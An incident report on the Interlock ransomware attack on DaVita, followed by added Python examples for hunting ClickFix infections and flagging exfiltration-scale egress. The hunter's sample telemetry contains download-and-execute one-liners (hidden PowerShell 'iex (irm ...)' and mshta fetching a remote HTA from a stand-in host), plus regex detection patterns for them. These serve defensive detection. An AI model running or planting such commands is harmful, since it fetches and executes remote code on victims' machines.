Full Report
The Interlock ransomware gang has claimed the cyberattack on DaVita kidney dialysis firm and leaked data allegedly stolen from the organization. [...]
Analysis Summary
# Incident Report: Interlock Ransomware Attack on DaVita
## Executive Summary
The healthcare provider DaVita suffered a ransomware attack that it became aware of on April 12, 2025, and which the Interlock ransomware group later claimed. Interlock says it exfiltrated approximately 1.5 terabytes of data, including patient records and financial information, and published it on its leak site after no ransom agreement was reached. DaVita disclosed the attack to the SEC, and the subsequent data leak prompted warnings for affected patients to monitor for suspicious activity.
## Incident Details
- Discovery Date: April 12, 2025 (the date DaVita reported becoming aware of the ransomware; the incident was disclosed to the U.S. Securities and Exchange Commission in a Form 8-K filing shortly afterwards)
- Incident Date: On or shortly before April 12, 2025
- Affected Organization: DaVita (A major kidney care provider)
- Sector: Healthcare
- Geography: United States (Implied, as DaVita is a major US provider with global operations)
## Timeline of Events
### Initial Access
- Date/Time: On or shortly before April 12, 2025
- Vector: Not stated in the article. Interlock has recently been observed using 'ClickFix' lures: fake CAPTCHA or 'fix this error' pages that copy a command to the clipboard and instruct the target to paste it into the Windows Run dialog, which installs an info-stealer or remote access trojan (RAT) as the initial foothold.
- Details: The intrusion resulted in a ransomware incident affecting some DaVita operations.
### Lateral Movement
- Details: Not specified in the article, but implicitly occurred to allow for data collection and exfiltration.
### Data Exfiltration/Impact
- Details: Interlock claims to have stolen **1.5 terabytes (approx. 700,000 files)** of data, including sensitive patient records, insurance information, user account details, and financial details.
### Detection & Response
- How it was discovered: DaVita became aware of the ransomware on its network and disclosed the incident to the U.S. Securities and Exchange Commission (SEC).
- Response actions taken: DaVita stated it was investigating the impact. Interlock's later publication of the data indicates that ransom negotiations either failed or never took place.
## Attack Methodology
- Initial Access: Not stated in the article. Interlock's recent intrusions have started with 'ClickFix' social engineering that gets the target to run a pasted command, installing an info-stealer or RAT.
- Persistence: Not detailed.
- Privilege Escalation: Not detailed.
- Defense Evasion: Not detailed.
- Credential Access: Not detailed, but implied necessary for large-scale data collection.
- Discovery: Not detailed.
- Lateral Movement: Unknown.
- Collection: Threat actor collected approximately 1.5 TB of data.
- Exfiltration: Approximately 1.5 TB of data was taken from the network; after negotiations broke down it was published on the Interlock dark web data leak site (DLS).
- Impact: Deployment of ransomware (implied by ransomware group claim) and exfiltration of sensitive data.
## Impact Assessment
- Financial: Not specified (costs were not disclosed).
- Data Breach: Estimated 1.5 TB of data compromised, including sensitive patient records and financial details.
- Operational: DaVita confirmed the attack affected "some operations."
- Reputational: Damage due to the public nature of a major data leak from a healthcare provider.
## Indicators of Compromise
- Network indicators - defanged: N/A (No specific IOCs provided in the summary text).
- File indicators: N/A
- Behavioral indicators: Interlock ransomware encryptor on Windows or FreeBSD hosts; ClickFix-style initial deployment (a script interpreter launched from the Run dialog with a download-and-execute command line, followed by an info-stealer or RAT).
## Response Actions
- Containment measures: Not detailed; DaVita reported only that an internal investigation was under way following detection.
- Eradication steps: Not detailed.
- Recovery actions: Not detailed.
## Lessons Learned
- Interlock is an evolving threat: it has recently shifted to 'ClickFix' lures that get targets to install the initial-access tools (info-stealers and RATs) themselves, before the group deploys its ransomware encryptor, which has Windows and FreeBSD variants.
- Targeting of critical healthcare infrastructure remains a high risk.
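The ClickFix pattern described above leaves two durable traces on a Windows endpoint: a process-creation event in which explorer.exe (the Run dialog host) spawns a script interpreter with a download-and-execute command line, and the pasted text itself under the RunMRU registry key. The following is an added hunting example, not code from the original report or from any Interlock or DaVita analysis; the Sysmon-like event fields, the .reg export and all host and URL names are constructed for illustration.

```python
"""Added example (not from the original report): hunting for ClickFix-style
self-infection in Windows process-creation telemetry and in the RunMRU key.
All inputs are constructed samples; field names are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Interpreters that pasted ClickFix one-liners typically invoke.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# Command-line fragments which, under an explorer.exe parent, point to a
# hand-pasted download-and-execute command rather than routine admin use.
SUSPICIOUS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution"),
    (re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I), "remote fetch"),
    (re.compile(r"https?://", re.I), "URL on command line"),
    (re.compile(r"-(w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I), "mshta remote HTA"),
]


@dataclass
class Finding:
    host: str
    image: str
    reasons: List[str]

    @property
    def score(self) -> int:
        return len(self.reasons)


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding when explorer.exe spawns an interpreter whose command
    line matches at least one ClickFix pattern; otherwise None."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in INTERPRETERS or parent != "explorer.exe":
        return None
    reasons = [label for rx, label in SUSPICIOUS if rx.search(event["CommandLine"])]
    return Finding(event["Computer"], image, reasons) if reasons else None


def hunt(events) -> List[Finding]:
    return [f for f in map(score_event, events) if f is not None]


def parse_runmru(reg_export: str) -> List[str]:
    """Recover pasted Run-dialog commands, most recent first, from a .reg text
    export of HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
    Each entry is a REG_SZ named a, b, c... holding the command plus a trailing
    '\\1' marker; the MRUList value orders the names by recency."""
    entries, order = {}, ""
    for line in reg_export.splitlines():
        m = re.match(r'"(\w+)"="(.*)"$', line.strip())
        if not m:
            continue
        name, raw = m.groups()
        value = re.sub(r'\\(["\\])', r"\1", raw)        # undo .reg escaping
        if name == "MRUList":
            order = value
        else:
            entries[name] = re.sub(r"\\1$", "", value)    # drop the \1 marker
    return [entries[n] for n in order if n in entries]


def flag_runmru(reg_export: str) -> List[str]:
    """Subset of RunMRU commands that match any ClickFix pattern."""
    return [c for c in parse_runmru(reg_export)
            if any(rx.search(c) for rx, _ in SUSPICIOUS)]


# Constructed telemetry: two pasted ClickFix commands, one benign Run-dialog
# launch, and one admin script started by an agent (not under explorer.exe).
SAMPLE_EVENTS = [
    {"Computer": "WS-104", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://lure.invalid/verify.txt)"'},
    {"Computer": "WS-104", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://lure.invalid/captcha.hta"},
    {"Computer": "WS-221", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
    {"Computer": "ADM-01", "ParentImage": r"C:\Program Files\Agent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

# Constructed .reg export of the RunMRU key after the pasted command above.
SAMPLE_RUNMRU = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="cmd\\1"
"b"="powershell -w hidden -c \"iex (irm http://lure.invalid/verify.txt)\"\\1"
"MRUList"="ba"
'''

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host}: {f.image} score={f.score} {f.reasons}")
    for cmd in flag_runmru(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

The explorer.exe parent is what separates a pasted Run-dialog command from the many legitimate PowerShell launches by management agents and scheduled tasks, so the parent check is deliberately a hard filter rather than one more scored reason. The RunMRU parser is the forensic complement: it recovers what was pasted even when process-creation logging was not enabled at the time.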
## Recommendations
- Audit security controls against tactics known to be used by Interlock, in particular 'ClickFix' social engineering: user awareness of fake CAPTCHA and 'fix' prompts, and endpoint telemetry that flags script interpreters launched from the Run dialog with download-and-execute command lines.
- Healthcare entities must rigorously enforce network segmentation and egress monitoring so that lateral movement and bulk data transfer are detected and halted soon after initial compromise.
- Have patient-notification and identity-monitoring procedures ready before an incident; when a leak site publishes large volumes of patient records, disclosure happens on the attacker's timeline.
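A theft on the scale claimed here (roughly 1.5 TB) is hard to hide in per-host outbound byte counts, even when the transfer itself is encrypted, which is the practical content of the egress-monitoring recommendation above. The following is an added example, not code from the original report or from DaVita: it flags a host whose daily egress jumps well above its own history. The flow records, addresses and thresholds are constructed for illustration.

```python
"""Added example (not from the original report): flagging an exfiltration-scale
jump in a host's outbound volume from per-flow records. Flow records and field
names below are constructed assumptions, not a real collector's format."""
from collections import defaultdict
from ipaddress import ip_address, ip_network
from statistics import median
from typing import Dict, List, Tuple

INTERNAL = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
            ip_network("192.168.0.0/16")]
GiB = 2 ** 30


def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL)


def egress_by_host_day(flows) -> Dict[str, Dict[str, int]]:
    """Sum bytes sent from internal sources to external destinations,
    keyed by source host and then by day. Internal-to-internal traffic is
    ignored: it may be lateral movement, but it is not egress."""
    totals: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for f in flows:
        if is_internal(f["src"]) and not is_internal(f["dst"]):
            totals[f["src"]][f["day"]] += f["bytes"]
    return totals


def flag_egress(flows, ratio: float = 10.0,
                min_bytes: int = 50 * GiB) -> List[Tuple[str, str, int, float]]:
    """Return (host, day, bytes_sent, baseline) for each day on which a host's
    egress is at least `ratio` times its median over earlier days and at least
    `min_bytes`. The absolute floor keeps a host going from 1 MB to 20 MB from
    alerting; the ratio keeps a backup server that always pushes 200 GiB quiet."""
    alerts = []
    for host, per_day in egress_by_host_day(flows).items():
        days = sorted(per_day)
        for i, day in enumerate(days):
            history = [per_day[d] for d in days[:i]]
            if not history:
                continue                      # no baseline yet for this host
            baseline = median(history)
            sent = per_day[day]
            if sent >= min_bytes and sent >= ratio * max(baseline, 1):
                alerts.append((host, day, sent, baseline))
    return alerts


# Constructed flows: a file server with a steady 2 GiB/day to a SaaS endpoint,
# then 400 GiB to a new external address on day 5; a backup host that always
# pushes 200 GiB; and a large internal transfer that must not count as egress.
SAMPLE_FLOWS = (
    [{"src": "10.20.5.17", "dst": "198.51.100.10", "day": f"2025-04-0{d}", "bytes": 2 * GiB}
     for d in range(1, 5)]
    + [{"src": "10.20.5.17", "dst": "203.0.113.77", "day": "2025-04-05", "bytes": 400 * GiB}]
    + [{"src": "10.20.9.2", "dst": "198.51.100.10", "day": f"2025-04-0{d}", "bytes": 200 * GiB}
       for d in range(1, 6)]
    + [{"src": "10.20.5.17", "dst": "10.20.9.2", "day": "2025-04-05", "bytes": 900 * GiB}]
)

if __name__ == "__main__":
    for host, day, sent, base in flag_egress(SAMPLE_FLOWS):
        print(f"{host} {day}: {sent / GiB:.0f} GiB out vs median {base / GiB:.0f} GiB")
```

In production the same per-host aggregation is usually run over hourly rather than daily buckets, and the destination that received the spike (here a previously unseen external address) is the first pivot for the investigation.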